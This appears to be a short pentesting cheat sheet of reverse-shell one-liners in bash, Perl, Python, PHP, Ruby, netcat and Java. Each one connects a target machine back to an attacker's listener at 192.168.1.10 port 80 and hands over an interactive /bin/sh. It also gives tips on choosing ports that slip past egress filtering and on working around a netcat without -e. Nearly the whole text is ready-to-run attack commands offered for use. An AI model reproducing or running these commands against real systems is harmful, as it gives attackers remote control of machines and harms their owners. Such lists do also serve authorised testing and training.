Alternate Reverse Shells

Netcat is frequently not installed on the target, so a netcat reverse shell is not always an option. In that case use whatever scripting language or tool is already present to open the connection instead (command -v followed by the interpreter name shows whether it is on the PATH). Here are reverse shell commands for several common technologies.

Start a netcat listener on your own machine before running any of the following commands. The examples assume the listener is on IP 192.168.1.10 and port 80; change both values to match your listener. A port such as 80 or 443 is a sensible default because outbound HTTP/HTTPS is the traffic least likely to be blocked by egress filtering.

Bash
bash -i >& /dev/tcp/192.168.1.10/80 0>&1

This must be run by bash itself, not sh: /dev/tcp is a bash feature, and on Debian-based systems /bin/sh is dash, which does not support it.
Perl
perl -e 'use Socket;$i="192.168.1.10";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.10",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

The same code works unchanged under Python 3; substitute python3 for python if only that binary is present.
PHP
php -r '$sock=fsockopen("192.168.1.10",80);exec("/bin/sh -i <&3 >&3 2>&3");'

This assumes the new connection is file descriptor 3, which holds when php is started from the command line as above with no other files open; if it is not, try 4, 5 or 6 instead.
Ruby
ruby -rsocket -e'f=TCPSocket.open("192.168.1.10",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat

I am including netcat as well for easy reference:

nc -e /bin/sh 192.168.1.10 80

If the target's netcat does not support -e (the OpenBSD build shipped by Debian and Ubuntu, for example, lacks it), then the following command may come in handy, as pointed out by Jeff Price:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.10 80 >/tmp/f
Java
// Java source rather than a one-liner: run it from any code that executes on the target.
// It relies on bash being present, since /dev/tcp is a bash feature.
Runtime r = Runtime.getRuntime();
String[] cmd = {"/bin/bash", "-c", "exec 5<>/dev/tcp/192.168.1.10/80;cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process p = r.exec(cmd);
p.waitFor();

Other Resources

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python
